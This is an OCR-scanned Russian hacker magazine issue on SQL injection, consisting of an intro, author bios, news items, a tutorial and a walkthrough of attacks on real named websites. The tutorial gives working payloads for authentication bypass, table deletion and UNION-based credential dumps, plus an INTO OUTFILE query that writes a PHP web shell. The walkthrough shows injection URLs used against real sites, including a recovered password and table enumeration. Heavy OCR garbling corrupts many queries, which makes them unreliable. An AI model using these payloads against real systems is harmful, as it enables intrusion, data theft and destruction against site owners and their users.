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intro 


За окном январь, тепло и дождь — довольно 
необычное сочетание. Впрочем, это интро тоже 

не совсем обычное. Дело в том, что этот номер 
СПЕЦа — последний... Нет, мы никуда не денемся, 
и журнал будет выходить и дальше, но он будет 
другим. Мы теряем слово Хакер в названии. 

Тяжело расставаться с духом исследований, 
взлома, мелкого хулиганства и нигилизма, но жизнь 
не стоит на месте: все взрослеют, набираются 
опыта и жизненной мудрости. Мы поняли, что наша 
и твоя жизнь неразрывно связана с компьютерами 
и информационными технологиями, и теперь 
внимание журнала будет сфокусировано Ha IT 
самого серьезного уровня. 

Мы будем помогать тебе работать и делать 
карьеру в ИТ-индустрии, решать профессиональ- 
ные проблемы и развиваться, атвоей компании — 
достигать новых высот и повышать эффективность 
бизнеса с помощью современных информационно- 
телекоммуникационных технологий. 

С выбором темы для последнего номера 
в старой ипостаси у нас вопрос не стоял: одноз- 
начно любимое направление — безопасность. 
Пересмотрев подшивку старых номеров, мы об- 
наружили, что мало внимания уделяли двум 
аспектам веб-безопасности, актуальность которых 
с каждым днем все возрастает. В результате 
ты держишь в руках журнал, посвященный вне- 
дрению вредоносного ЗО! -кода (SQL Injections) 

и HTML/JavaScript-koga (Cross-Site Scripting, XSS) 
и защите OT него. 

Р.$. В этом номере ты не найдешь рубрики 
е-мыло. Мы сознательно пошли на это, чтобы пару 
страниц посвятить тем, кто в течение трех с поло- 
виной лет делал Хакер СПЕЦ, то есть себе. 
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Евгений Докукин 
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ее Spider_NET 


Активный участник проекта vr-online.ru, ранее принимал участие в другом проекте — 
mashp (mashp.h10.ru). В реальной жизни работает администратором БД и программистом. 
В профессиональном программировании более 4 лет, в основном пишет 


Ha Delphi u PHP. 


Крис Касперски 


Известен еще как мыщьъх и NezuMi. Компьютеры грызет еще стех времен, когда Правец-8Д считался 
крутой машиной, а дисковод с монитором были верхом мечтаний. Освоил множество языков 
программирования и операционных систем, из которых реально использует W2K, а любит FreeBSD 4.5. 
Живет в норе, окруженной по периметру компьютерами и стеллажами с литературой. 


В Сети известен под псевдонимом MustLive. В ИТ-индустрии более 13 лет, стого момента, 

когда отец подарил первый компьютер — Поиск 2. С тех пор вся жизнь тесно связана с информационными 
технологиями. Активно пропагандирует социальный секьюрити аудит — безвозмездный поиск 
уязвимостей. Известен своим проектом по веб-безопасности hitp://websecurity.com.ua. 


= 1 Михаил Фленов 


Известен под ником Ногийс. Создатель сайта www.vr-online.ru, автор 11 книгна русском 
и 4 на английском языке. Написал множество статей в такие журналы как Хакер (внештатный автор 
почти с самого рождения журнала), ХакерСПЕЦ и другие компьютерные издания. 
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{зарождение} Инцидент произошел 
в Корее, когда хакеры взломали сайт 
MSN Korea. Они вставили в блок но- 
востей вредоносный код, который, в 
свою очередь, пытался украсть с ком- 
пьютеров пользователей, посещаю- 
щих этот сайт, пароли к онлайновой 
игре Lineage. Именно тогда уязви- 


В Microsoft публично 
назвали уязвимость 
типа Cross-Site Scripting 
серьезной угрозой 
безопасности сайтов 


мость типа Cross-Site Scripting nony- 
чила широкую огласку, a в Microsoft 
заявили, что это серьезная угроза бе- 
зопасности сайтов. Естественно, про- 
блема была устранена, но с тех пор 
это потенциальная уязвимость номер 
один у любого динамического сайта, 
работающего с базой данных. 
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{бомба замедленного действия} Жизнь 
владельцев форумов, использующих 
движок phpBB (самый популярный 
форум в мире), стала кошмаром пос- 
ле того, как в 2004 году был опубли- 
кован эксплойт до выхода официаль- 
ного исправления oT hpBB. Причем 


после появления информации о дыре 
разработчики форума заявили, что 
она опасности не представляет и бу- 
дет устранена с выходом следующе- 
го релиза форума. Однако через нес- 
колько дней появился эксплойт, поз- 
воляющий выполнять произвольные 
команды на уязвимом сервере. Бук- 
вально через несколько часов после 
появления вредоносного кода в сво- 
бодном доступе phpBB опубликовал 
пропатченную версию phpBB 2.0.11, 
но не все узнали об этом вовремя... 

И все равно форум phpBB оста- 
ется одним из наиболее популярных 
среди веб-мастеров, прежде всего 
из-за простоты установки и настрой- 
ки. Каждый надеется, что его беда 
обойдет стороной... 


ЭР" Г 
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{харакири фишеру} На территории 
Японии был задержан злоумышлен- 
ник Кадзума Ябуно, который про- 
мышлял сбором конфиденциальной 
финансовой информации с помощью 
фишерского сайта Yafoo! Japan, на- 
писание URL которого почти иден- 
тично с официальным японским пор- 
талом Yahoo!. Еженедельно жертва- 
ми «рыбалки» становились от 20 до 
30 человек. Причем эти люди, ничего 
не подозревая, легко делились своей 
личной информацией: логинами, па- 
ролями, номерами кредитных карт... 
Управление сайтом злоумышленник 
осуществлял как с домашнего, так 
и с рабочего компьютера. Кадзуме 
были предъявлены обвинения в на- 
рушении авторских прав и несанкци- 
онированном доступе к информации, 
после чего он был взят под стражу. 
Подобный прецедент является пер- 
вым на территории Японии, в отли- 
чие от тех же Штатов, где это вполне 
нормальная практика. 


Лидеры по количеству найденных уязвимостей 
По результатам опроса Ha www.securitylab.ru 


Mozilla Firefox 


54% 


Internet Explorer 24% (®) 
=a 


Safari 


15% 


Opera 


25 уязвимостей было устранено в Inter- 
net Explorer с января по сентябрь 2006 
года. В Mozilla Firefox уязвимостей бы- 
ло найдено еще больше — целых 56, 
36 из которых были критическими и 


7% 


могли быть использованы для получе- 
ния полного контроля над уязвимой 
системой. В Орега было найдено всего 
7 уязвимостей, а в Safari — 16 (www.se- 
curitylab.ru/analytics/273335.php). 


Какой движок для меБ-сайта наиболее безопасен? 
Данные основаны на опросе в рамках проекта www.securitylab.ru 
в декабре 2006 года, в котором приняли участие 397 человек 


собственноручно 
написанный движок 


44.84% 


cms под свободными 
лицезиями (Drupal, XOOPS, 
PHP-Nuke и другие) 


18,89% 


не знаю 


17,63% 


ными лицензиями с открытым 


cms под свободными проприетар- 1 О 08 
— 9 


исходным кодом (битрикс) 


ными лицензиями с закрытым 


стз под свободными проприетар- 7 & 1 % 
ыы 9 


исходным кодом (большинство 


платных cms) 


2006 


{Тор 20} Ведущая организация ком- 
пьютерной безопасности SANS Institu- 
{е опубликовала ежегодный список 20 
программ (Тор 20 Security Attack Tar- 
gets), которые являются излюбленны- 
ми целями хакеров (www.sans.org/top20/). 
Заветные цели — приложения Micro- 
soft: Internet Explorer, Office, Windows 
Libraries... Mac OS X компании Apple 
попал в этот список со «слабой KOH- 
фигурацией» в Unix. По данным все 
той же SANS, 40 процентов веб-при- 
ложений являются уязвимыми для 
SQL Injection атак и 80 процентов — 
для Cross-Site Scripting атак. 
Любимые цели среди приложений: 

1 М/еб-приложения 

2 Базы данных 

з Файлообменники 

4 Мессенджеры 

5 Медиаплейеры 

в О№$5-серверы 

7 Приложения для бэкапа 


{43%} Столько проблем приходится 
на веб-приложения, написанные на 
РНР и связанные с безопасностью 
информационных сетей. Таковы ре- 
зультаты исследования, проведенно- 
го в 2006 году американским Нацио- 
нальным институтом стандартов 
и технологии (NIST), которые были 
опубликованы на сайте зесийую- 
cus.com. Такой вывод основан на ана- 
лизе 6198 уязвимостей, зафиксиро- 
ванных в 2006 году, из них 2690 (те 
самые 43 процента) содержали в опи- 
сании слово «РНР». Примечательно, 
что еще в 2005 году на долю прило- 
жений на платформе РНР приходи- 
лось всего 29% уязвимостей. Поэто- 
му можно сделать вывод, что пробле- 
ма кроется скорее в самих разработ- 
чиках, которые думают о безопаснос- 
ти в последнюю очередь. К тому же 
многие из них не являются настоящи- 
ми профессионалами. © 
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> SQL Injection — внедрение произвольных 
ЗОЕ-команд, в результате которого меняется логика 
оригинального запроса к базе данных. Это предста- 
вляет серьезную угрозу, так как таким образом злоу- 
мышленник может утянуть из нее конфиденциаль- 
ную информацию. Типичный пример — через ошиб- 
ки в меб-интерфейсе у разных провайдеров не раз 
крали базы с логинами и паролями пользователей. 
Успешность атаки SQL Injection не зависит 
от используемого для написания меб-приложений 
языка программирования — будь то РНР, Рей или 
ASP. Если сценарий работает с базами данных, а про- 
верка входных параметров отсутствует, то всегда 


ГЛОБАЛЬНАЯ ЭПИДЕМИЯ 


22 ПРИТОНЫ ИНТЕРНЕТА 34 ВАКЦИНА ДЛЯ САЙТА 
26 ПРОТИВОУКОЛЬНЫЙ КОСТЮМ 
30 ВНУТРИМЫШЕЧНО И ВНУТРИВЕННО 


дефектный 
замысел 


SQL Injection 


АТАКИ ТИПА SQL INJECTION — ЧАСТЫЕ ГОСТИ В ЛЕНТАХ BUGTRAQ. ФОРУМЫ, 
ГОСТЕВЫЕ КНИГИ И РАЗНООБРАЗНЫЕ СЦЕНАРИИ, КОТОРЫЕ ИСПОЛЬЗУЮТ 
ДЛЯ ХРАНЕНИЯ ИНФОРМАЦИИ БАЗЫ ДАННЫХ, РЕГУЛЯРНО ПОДВЕРГАЮТСЯ ИМ 


есть возможность внедрения ЗО! -кода. Это отно- 
сится не только к меб-приложениям, но и к обычным 
программам, которые работают с базами данных. 

> Kak это происходит? Чтобы не грызть сухую 
теорию, давай рассмотрим небольшой пример. До- 
пустим, у тебя на сервере баз данных есть своя ба- 

за, авней — таблица Users, в которой хранится ин- 
формация обо всех зарегистрированных пользова- 
телях. Как правило, такие таблицы имеют минимум > 
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Птица обломинго 


три поля: id (идентификатор), UserName (имя поль- 
зователя) и Password (пароль). Допустим, для того 
чтобы посмотреть профиль пользователя, исполь- 
зуется следующий запрос к базе данных: 


В данном примере видно, что значение поля id бу- 
дет сравниваться со значением переменной. Если 
в качестве значения переменной указать, напри- 
мер, 10, то честный пользователь увидит свой про- 
филь. Вроде все хорошо и прекрасно, но что будет, 
если модифицировать запрос до такого вида: 


После выполнения такого запроса отобразится запись 
не только с id = значению переменной, но и запись, 
в которой значение поля UserName = Администратор. 
То есть после такого запроса хакер увидит всю ин- 
формацию об учетной записи «Администратор». 


На этом примере видно, что после того, как мы допи- 
сали к URL дополнительные ЗО! -команды (OR User- 
Name=...), логика запроса изменилась. Отсутствие 
фильтрации входных параметров — вот причина, из- 
за которой появилась возможность воспользоваться 
SQL Injection! Чтобы этого не произошло, необходи- 
мо перед выполнением запроса в сценарии кое-что 
проверить. В данном случае достаточно просмотреть 
содержимое одной (это при условии, что остальные 
переменные нигде не видны, но лучше проверять 
все) переменной id: в ней не должно быть никаких 
символов, кроме цифр от 0 до 9. 

> проблема специальных символов. Знатоки 
языка запросов SQL знают, что с помощью спе- 
циальных символов можно полностью изменить ло- 


гику запроса и обойти многие ограничения, которые 
изначально придумывал программист. 

1Одинарные и двойные кавычки. Их используют 
для выделения значений. Предыдущий пример (User- 
Name = 'Администратор’) как раз об этом. Первое, с 
чего начинает хакер свое исследование, это попытка 
вставки одинарной кавычки вместе со значением пе- 
ременной. Если отсутствует фильтрация на спецсим- 
волы, то взломщик увидит ошибку, сгенерированную 
сервером БД. В результате он уже точно будет знать, 
что есть возможность внедрить свой ЗОЁ-код. 

Значит, в своем сценарии надо отключить вы- 
вод любых ошибок. Лучше в момент возникнове- 
ния ошибки вывести свой текст, чем текст, который 
сгенерирует сервер БД. 

2 Двойное тире. Два тире подряд в SQL означа- 
ют начало комментария. То есть все, что будет по- 
сле двух знаков тире, не будет восприниматься как 
часть запроса. Рассмотрим пример: 


Это запрос должен выбрать запись, где none User- 
Мате равно root (как правило, в основном это имя 
используется для обозначения супер-пользовате- 
ля), а поле Password равно значению переменной. 
Имя мы знаем, а пароль, естественно, нет. Но это 
не повод отчаиваться — можно умудриться моди- 
фицировать запрос до такого вида: 


В результате, код, который стоит после двух знаков 
тире (AND Password = переменная), не будет выпол- 
нен, и, следовательно, мы успешно проходим дан- 
ную проверку, зная одно лишь имя пользователя. 
В SQL есть еще пара символов, которые 
обозначают комментарий, — «/*». Если вдруг ока- 
зывается, что знак тире фильтруется, то можно 
воспользоваться «/*». Принцип действия тот же са- 
мый. Весь текст запроса, который стоит после этих 
символов, не будет выполняться, а значит, можно 
отбросить лишние проверки и обойти защиту. 


зЗнак равенства. Казалось бы, чем может гро- 
зить простой знак равенства (=)? Но при правильном 
подходе и отсутствии фильтрации этого символа знак 
равенства превращается в боевое оружие. Пример: 


Взломщик может без проблем в качестве значения 
переменной подставить «1 OR УзегМате=Админ», 
и запрос легким движением руки превратится в: 


Результат этого запроса вернет запись, где none id 
равно единице или none UserName равно «Админ». 
Теперь представь, что было бы, если бы знак равен- 
ства всегда отрезался. Запрос уже выглядел бы 
следующим образом: 


Этот запрос неверный, поэтому он не будет выполнен 
сервером БД, а значит, взломщик останется с носом. 

4Точка с запятой. Знак «;» тоже относится к спе- 
циальным символам, он используется для разделе- 
ния запросов между собой. Любой сервер БД мо- 


как ищут 
укромное местечко 
для SQL Injection 


ПЕРВЫМ ДЕЛОМ ИЩУТ ЛЮБЫЕ 
СЦЕНАРИИ НА САЙТЕ. БЫВАЕТ ТАК, 
ЧТО ВЕСЬ САЙТ ВЫПОЛНЕН В ВИДЕ 
СТАТИЧНОГО НТМЕ, А КАКОЙ-НИБУДЬ 
ОДИН РАЗДЕЛ (НАПРИМЕР, НОВОСТИ) 
ЯВЛЯЕТСЯ СЦЕНАРИЕМ. ВОТ В НЕМ 

И ИЩУТ ВОЗМОЖНОСТЬ ВНЕДРЕНИЯ 
SQL INJECTION. ПРОБУЮТ ПОДСТАВЛЯТЬ 
СВОИ $ОЕ-КОМАНДЫ К ЗНАЧЕНИЮ 
ПЕРЕМЕННЫХ, КОТОРЫЕ ПЕРЕДАЮТСЯ 
СЦЕНАРИЮ. 


ЕСЛИ НА АТАКУЕМОМ САЙТЕ ЕСТЬ 
ПОИСК, ТО ЕГО ТОЖЕ ПРОВЕРЯЮТ. 

НА МНОГИХ САЙТАХ СЦЕНАРИИ 

ПОИСКА — САМОПИСНЫЕ, ЗНАЧИТ, 
ВСЕГДА ЕСТЬ ШАНС, ЧТО ПРОГРАММИСТ 
ГДЕ-ТО ДОПУСТИЛ ОШИБКУ. 


ФОРУМ И ГОСТЕВЫЕ КНИГИ — 
ОТЛИЧНОЕ МЕСТО ДЛЯ ПОИСКА 
УЯЗВИМОСТЕЙ. СТОИТ ТОЛЬКО УЗНАТЬ 
НАЗВАНИЕ И ВЕРСИЮ ФОРУМА 

И, ЕСЛИ ОН ИЗВЕСТНЫЙ, МОЖНО 
ПОПРОБОВАТЬ НАЙТИ УЖЕ ГОТОВЫЙ 
ЭКСПЛОЙТ В СЕТИ. 


жет выполнять несколько действий одним запро- 
сом, но для этого каждое действие в запросе дол- 
жно быть отделено друг от друга точкой с запятой. 
Как этим можно воспользоваться? 


SELECT * FROM Users WHERE id = переменная 


Теперь, представим, что в переменную, с которой срав- 
нивается значение поля id, вписывается значение: 


1; DELETE FROM Users 
Запрос будет выглядеть следующим образом: 


SELECT * FROM Users WHERE id = 1; 
DELETE FROM Users 


Сначала сервер выполнит выборку из таблицы Us- 
ers — запись, в которой значение поля id равно еди- 
нице. А затем полностью удалит все записи из та- 
блицы Users. Конечно, в реальной ситуации очи- 
стить все содержимое таблицы непросто, так как 
необходимо знать ее имя, а получить имена таблиц 
бывает не так просто... но возможно. 

5 Знак плюса. Знак плюса в SQL сопоставляет- 
ся со знаком пробела. Допустим, что воспользо- 
ваться обычным символом пробела бывает невоз- 
можно (фильтруется он, и все тут), в этом случае 
можно воспользоваться знаком плюса. 


SELECT * FROM Users WHERE id = 1+ 
OR+UserName=AnMuHUCTpaTop 


Такой запрос будет абсолютно корректен и успеш- 
HO выполнится. 

> = специальные операторы. В языке SQL есть мно- 
жество операторов, воспользовавшись которыми, 
можно получить гораздо больше возможностей, чем 
при использовании простых специальных символов. 


1|NSERT. Этот оператор используется для встав- 
ки новых записей в таблицу. Бывает необходимо 
сделать себе аккаунт (допустим, на каком-нибудь ин- 
тересном форуме, где просто так не зарегистриру- 
ешься). Тогда, найдя возможность внедрения, мож- 
но добавить в запрос этот оператор. 


SELECT * FROM Users WHERE UserName=root 
INSERT INTO sens 
"“spider_net”, “qwerty”) 


and Password=123; 
values (“0”, 
После выполнения такого запроса в таблице User- 
Мате добавится новая запись, в которой будут со- 
держаться данные нового пользователя с логином 
spider_net и паролем qwerty. 

21 КЕ. Оператор LIKE идентичен знаку «=», 
только используется для сравнения строк. Но многие 
забывают о том, что проще показать на примере: 


SELECT * FROM Users WHERE UserName LIKE 
переманная1 AND Password LIKE 
переменная? 


Если для сравнения используется именно LIKE, 
то достаточно к значению переменной с паролем 
добавить символ «%». В результате запрос будет 
выполнен успешно, и если он используется для ав- 
торизации пользователей, то мы без проблем смо- 
жем залогинится под любым пользователем. 


SELECT * FROM Users WHERE UserName LIKE 
root AND Password LIKE % 


В SQL знак процента используется для сопоставле- 
ния с любыми символами. Эта ошибка достаточно 
распространена, особенно в самописных сцена- 
риях. Если ты занимаешься исследованием подоб- 
ного сценария, то первым делом имеет смысл про- 
верять внедрение именно этого знака. 


3 UNION. Оператор UNION служит для объедине- 
ния запросов. Если удается внедрить этот оператор 
в запрос, то перед тобой открываются безграничные 
возможности. Допустим, ты нашел какой-нибудь уяз- 
вимый сценарий (например, раздел новостей), но из- 
девательства над новостями тебя не интересует, 
а хочется всего лишь утянуть всю базу данных с ло- 
гинами и паролями юзеров. Вот в этом случаем как 
нельзя кстати пригодится оператор УМОМ. 


SELECT * FROM News WHERE id=1 UNION 
SELECT Id, UserName, Password FROM Users 


После выполнения этого запроса помимо текста HO- 
вости отобразится информация обо всех учетных 
записях из таблицы UserName. 

4OUTFILE. Думешь, что если ты нашел возмож- 
ность внедрения, то единственное, чем можно 
управлять на атакуемом сайте, это база данных? 
Нет, это не так — с помощью SQL можно получить 
доступ и к файловой системе. Пример: 


SELECT “Мой текст’ 
Еее 


INTO OUTFILE 


Если запрос выполнился успешно, TO будет создан 
файл text.txt с единственной фразой «Мой текст». 
Конечно, если записать простой текст в файл, то 
выгоды будет мало. Но что если записать в каче- 
стве текста свой сценарий, который будет выпол- 
нять какую-нибудь системную функцию... 


SELECT '<?php system($cmd) 
ENO ое Omer jobs 


И 


Запрос создаст РНР-сценарий, который будет вы- 
полнять команду из переменной $ста. Аналогично 
можно дефейснуть сайт, перезаписав файл index 
(если есть соответствующие права). © 
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осознанный 
пример 


Сразу хотим предупредить, что все владельцы уяз- 
вимых сайтов, которые фигурируют в примерах, бы- 
ли проинформированы о наличии дыр. 

> — АРАНер Center. Чтобы найти первую жертву, 
запускаем с помощью google.com поиск по Сети, где 
в URL встречается .php и имя параметра id. Первый 
сайт, который заинтересовал своим названием, 
оказался пустым, точнее, сценарии не получали па- 
раметров, поэтому его отбросили. А вот второй ока- 
зался более удачным — APA Help Center (www.apa- 
helpcenter.org). Что такое АРА? Оказывается, 
это The American Psychological Association или аме- 
риканская ассоциация психологов. Протестируем 
психологов на вшивость... 

Для начала ищем сценарии, которые получа- 
ют какие-либо параметры. Долго искать не приш- 
лось, BOT оно — чудо природы: www.apahel- 
pcenter.org/featuredtopics/feature.php. Этот сценарий по- 
лучает параметр id, которому передается число. 


Реальная угроза SQL Injection 


СОБСТВЕННЫЕ ОШИБКИ ПОМОГАЮТ ЛУЧШЕ ПОНЯТЬ ТЕМУ. ОНИ ОТКЛАДЫВАЮТСЯ В 
ПАМЯТИ И ПОЗВОЛЯЮТ НЕ СОВЕРШАТЬ ПОДОБНОГО В БУДУЩЕМ. НО КОГДА 
ПРОГРАММИСТ СОЗДАЕТ «БОЕВОЙ» КОД, ТО ОШИБКИ МОГУТ ПРИВЕСТИ К ПЕЧАЛЬНЫМ 
ПОСЛЕДСТВИЯМ. ПРОЦЕСС ВОССТАНОВЛЕНИЯ НАС СЕЙЧАС НЕ ИНТЕРЕСУЕТ, НАС 
ИНТЕРЕСУЮТ САМИ ОШИБКИ. ДЛЯ ЭТОГО ПРОТЕСТИРУЕМ НЕСКОЛЬКО САЙТОВ НА 
ПРЕДМЕТ УЯЗВИМОСТЕЙ И ПРОАНАЛИЗИРУЕМ РЕЗУЛЬТАТ 


Михаил Фленов aka Horrific} 
http://www.vr-online.ru 


) 


Добавляем в конец значения параметра стро- 
ку «апа 1=0» и перегружаем страничку. Та же 
страничка, только пустая. Попробуем добавить 
еще union select 'Тез! — инжектируется дополни- 
тельный запрос, который просто возвращает сло- 
во Test. Если это слово появится где-то на страни- 
це, значит, нам сопутствует удача. В центре стра- 
ницы появилась надпись Мех{ раде, после которой 


красовалась ссылка с именем Test. Вот куда попа- 
ло имя инжектированного запроса. Итак, URL, ко- 
торый подтверждает наличие уязвимости, выгля- 
дит следующим образом: 


http: //www.apahelpcenter.org/featured- 
topics/ feature. php?id=38%20and%201= 
0%20unions20select320'Test'-- 


ЗНАНИЕ ЯЗЫКА SQL И ОСОБЕННОСТЕЙ РАЗЛИЧНЫХ БАЗ ДАННЫХ 
ПОМОЖЕТ В ТВОИХ ИССЛЕДОВАНИЯХ 


Теперь поищем что-то более интересное. Посмот- 
рим имя базы данных, версию и имя пользователя. 
Для этого в URL меняем 'Test' Ha DATABASE() и no- 
лучаем искомые данные: 


База данных: apahelpcenter 
4.0.20a-debug 
Имя пользователя: 


Версия: 
prac0Olweb@prac01.apa.org 


Прекрасненько. А что еще тут есть? Доступа к сис- 
темной базе данных MySQL не оказалось. Видимо, 
хостер — не дурак и запретил любые телодвижения 
в эту сторону. Попробуем подобрать имена таблиц. 
И снова удача на нашей стороне, потому что амери- 
канцы не любят использовать префиксы, а использу- 
ют банальные слова для именования объектов. Пара 
минут страдания, после которых выясняется, что на 


сервере есть таблицы с именами articles и users. Ко- 
нечно же, вторая таблица наиболее интересна. Но 
какие в ней поля? Методом подбора выясняется, что 
есть поля id и password. Следующий запрос показал 
пароль первого пользователя в таблице: 


http: //www.apahelpcenter.org/featured- 
topics/feature.php?id=38%20and%201= 
0%20union%20select320password%20FROM 
$20users$201imit%200,1-- 


Пароль банален — apanick. Американская наив- 
ность :). Так как на сайте нет регистрации, а втабли- 
це пользователей всего две записи, можно предпо- 
ложить, что где-то есть админка и это пасс — 
для доступа в нее. Но админку не нашли. Облазили 
весь сайт: нигде нет поля для ввода пароля, а сцена- 
рии типа /admin/index.php, admin.php не существуют. 
Оставим это для других и двигаемся дальше. 
> — Америка вчера. Поищем ошибки в USA-HeTe. 
Нравится американский net тем, что здесь ошибок на 
сайтах очень много, видимо, экономят на программис- 
тах. Или программисты — из прошлого века и не зна- 
юто существовании таких угроз, как SQL Injection. 
Следующую жертву долго искать не приш- 
лось. В процессе поиска натыкаемся на WWW.news- 
paperads.com. Заинтересовал тем, что: 


1 КРУПНЫЙ; 
2 ПРИНАДЛЕЖИТ ЗНАМЕНИТОЙ USA TODAY; 
3 ПОСТРОЕН НА ASP + MS SQL SERVER. 


Отправим USA Today в Yesterday, ибо дыр здесь 
превеликое множество. Наугад тыкаем по ссылкам 
и попадаем на страницу: 


http: //www.newspaperads.com/usatoday/ 
results.asp?subcatid=1600&inter- 
faceid=82&parent =Categories&subcatname= 
Travel+Specials 


Здесь собраны статьи Ha тему путешествий. Попро- 
буем попутешествовать по базе данных newspaper- 
ads.com. Все оформлено в виде таблицы из трех ко- 
лонок: Advertiser, Summary и Date. Обожаю страни- 
цы с таблицами, потому что в них больше простран- 
ства для злых манипуляций и можно видеть резуль- 
тат. Странице передается несколько параметров, 
но самый интересный — subcatid. По имени уже яс- 
но, что это идентификатор, по которому происходит 
поиск по базе. Попробуем добавить в конец пара- 
метра одинарную кавычку. Ага, произошла ошибка 
запроса. То, что доктор прописал. 

Изучаем ошибку и понимаем, что в ней куча 
всякой ерунды, но чтобы инжектировать SQL-kog, 
необходимо в конец параметра добавить две зак- 
рывающиеся круглые скобки и комментарием отш- 
вырнуть все остальные условия. Итак, пробуем 
внедрить в параметр subcatid следующее значение: 


1600)) and 1=0 - 
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Вот они — заветные имена таблиц 


Условие «1=0» поставили для того, чтобы резуль- 
тат был заведомо пустым. Нам не нужны статьи 
про путешествия, нам нужно содержимое базы 
данных. Теперь подбираем количество полей, ко- 
торые возвращают запрос. Для этого в запрос 
внедряем объединение UNION SELECT NULL, ... 
последовательно увеличивая количество NULL- 
полей. В итоге получилось 11 полей. Именно при 
таком количестве МИ--значений ошибка запро- 
са исчезла и появилась таблица, правда, пустая. 
Теперь нужно узнать, какие поля и куда попада- 
ют на форме. Для этого можно во внедренном 
запросе выбирать не нулевые значения, а какие- 
то числа, уникальные для каждого поля. Напри- 
мер, следующий запрос выбирает в каждом поле 
число от 0 до 11: 


1600)) and 1=0 union all select 
Порой, ОЕ 


Ага, число 7 появилось в колонке Зиттагу. Будем 
использовать седьмое поле для того, чтобы просмат- 
ривать системные данные. Нас интересуют первым 
делом имена таблиц, которые используются в базе 
данных. Их можно получить из таблицы INFORMA- 
TION_SCHEMA.TABLES. Инжектируем следующий 
код в параметр subcatid: 


1600)) and 1=0 union all select 
2 oi, 5,6, ABLE NAME 8,9), 0, 11 
from INFORMATION_SCHEMA .TABLES-- 


Все прошло удачно и перед нами список таблиц 6a- 
зы данных. Самое интересное, что показываются 
только первые 20 строк, но внизу страницы есть на- 
вигация по страницам 1, 2, 3... Навигация очень хо- 
рошая, потому что путешествует даже по инжекти- 
рованному запросу :). Так что не нужно ограничи- 
вать вывод данных с помощью инъекции. 

Можно было бы двигаться дальше и органи- 
зовать дефейс или уничтожить данные, но это 
не наш метод. Мы написали админам об ошибке. 
Спасибо newspaperads.com за приятное путешествие 
по их базе :). 
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Милый сайт с милыми ошибками 


> cold fusion. Следующую жертву решили ис- 
кать среди сайтов, построенных на технологии 
Macromedia Cold Fusion. Долго искать не пришлось. 
Первым на глаза попался сайт сената США, а точ- 
нее — его департамента по коммерции (соттегсе.- 
senate.gov). Просмотр показал, что большинство па- 
раметров не фильтруют одинарную кавычку. Нап- 
ример, в следующем URL уязвим параметр id: 


Если добавить к параметру «id=1705 and 1=1», то сце- 
нарий проглотит эту инъекцию и не подавится. Оди- 
нарная кавычка также не фильтруется. Но подобрать 
количество полей не удалось, потому что фильтруют- 
ся запятые, тире, слеши и знак процента. Шутить с се- 
натом не особо хочется, потому что это чревато серь- 
езными последствиями — мы оставили сайт в покое. 

Кстати, сервер senate.gov содержит не толь- 
ко сайты сенатов, но и отдельных сенаторов. 
И большинство параметров фильтруется не очень 
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качественно. Мы особо не ковырялись, потому что 
дорожим своей свободой :). 

>  удобряем. Следующая жертва — www.com- 
postingcouncil.org. Сайт посвящен каким-то консуль- 
тациям по удобрениям. Давай попробуем окучить 
базу данных, тем более что программер вообще не 
знает такого слова, как фильтрация. Берем любой 
параметр и начинаем его удобрять. В качестве це- 
леуказания выбрали следующий сценарий: 


Здесь уязвим параметр id. Если добавить в его ко- 
нец одинарную кавычку, то произойдет ошибка вы- 
полнения сценария. Рассмотрим ошибку подроб- 


Очевидно, что тут используется ODBC Microsoft 
Access Driver. То есть в качестве базы данных ис- 
пользуется банальный MS Access. Попробуем по- 
ковыряться. 

Для начала определим количество полей, 
возвращаемых запросом. Оказалось, что Access 
не может возвращать безымянные SELECT, и обя- 
зательно должна быть секция FROM с именем таб- 
лиц. Будем знать. Так как на сервере есть регист- 
рация, попробуем предположить, что существует 
таблица изег$. Вбиваем в браузер следующий 
URL: 


Великолепно! Такая таблица действительно суще- 
ствует, потому что сервер сообщает нам, что коли- 
чество полей в объединенном запросе не совпада- 
ет. Теперь можно подбирать поля. Получилось 
13 штук. Несчастливое число, особенно для прог- 
раммиста этого сайта. Попробуем подобрать поля, 
которые есть в таблице users. Подбор показал, что 
здесь присутствуют userid, email и memberpwd. 
В принципе, для взлома этого уже достаточно, ведь 
при регистрации спрашивают мыло и пароль, а эти 
данные уже можно вытащить из таблицы Users с по- 
мощью инжектирования. 

Теперь попробуем определить, какие еще 
таблицы есть в базе. Справка MS Access подсказа- 
ла, что есть такая системная таблица MSysObjects, 
в которой в поле пате находятся имена всех таб- 
лиц базы данных. Попробуем инжектировать зап- 
рос SELECT к этой таблице: 


Поле пате вставили в седьмую позицию инжекти- 
рованного запроса. Содержимое этого поля выво- 
дится в виде таблицы на результирующей мер-стра- 
нице (результат смотри на рисунке). 

Таким образом, есть все мыльники, иденти- 
фикаторы и пароли зарегистрированных пользова- 
телей (зарегистрировано только три человека 
и один из них явно админ). И есть имена всех таб- 
лиц. На этом исследование можно прекращать. 
> = няньки и акушерки. Следующий сайт, кото- 
рый попал на глаза — www.midwife.com. Владелец — 
колледж нянек и акушерок. Давай попробуем вни- 
мательно исследовать эту жертву. Оформлен сайт 
неплохо, сценарии Ha Macromedia ColdFusion напи- 
саны достаточно интересно. 


Попробуем всадить в какой-нибудь параметр сим- 
вол одинарной кавычки и посмотрим на результат. 
На первый взгляд, результат обнадеживающий, по- 
тому что произошла ошибка выполнения сценария. 
Сообщение об ошибке гласит, что на сервере ис- 
пользуется MySQL и база данных с именем plas- 
macms. Может быть, где-то существует такой CMS 
по имени Plasma, а может быть это самописный 
движок, просто админ решил его так красиво наз- 
вать. Попробуем принять роды без этого, хотя мож- 
но где-нибудь на халате записать информацию, на 
будущее. 

Смотрим, на чем же все-таки заткнулся сце- 
нарий. А он заткнулся на запросе: 


Попробуем подумать, что здесь происходит. Су- 
дя по именам полей, которые вытаскиваются 
из таблицы plasmaContent, CMS действительно хо- 
рошая. Дело в том, что по номеру ID из таблицы вы- 
бирается заголовок, шапка, подвал и URL страни- 
цы, которую нужно отобразить. Это значит, что ес- 
ли попытаться инжектировать свой код, ничего не 
выйдет. В поле раде РЕ должен быть какой-то URL 
страницы, который узнать проблематично. Кто его 
знает, с каким дефектом няньки и акушерки произ- 
вели на свет своего ме-программиста, и что он 3a- 
сунул в это поле. Попытки вставить в него что-либо 
не увенчались успехом. 

Для инжектирования ЗОЕ-кода нужно исполь- 
зовать следующий URL: 


Но вместо числа 8 на конце необходимо указать ка- 
кое-то реальное значение из базы данных, иначе 
сценарий вываливается в ошибку «URL не найден». 

Таким образом построены абсолютно все 
страницы на сайте. Но не стоит опускать руки: бе- 
рем скальпель и делаем «Кесарево сечение». 
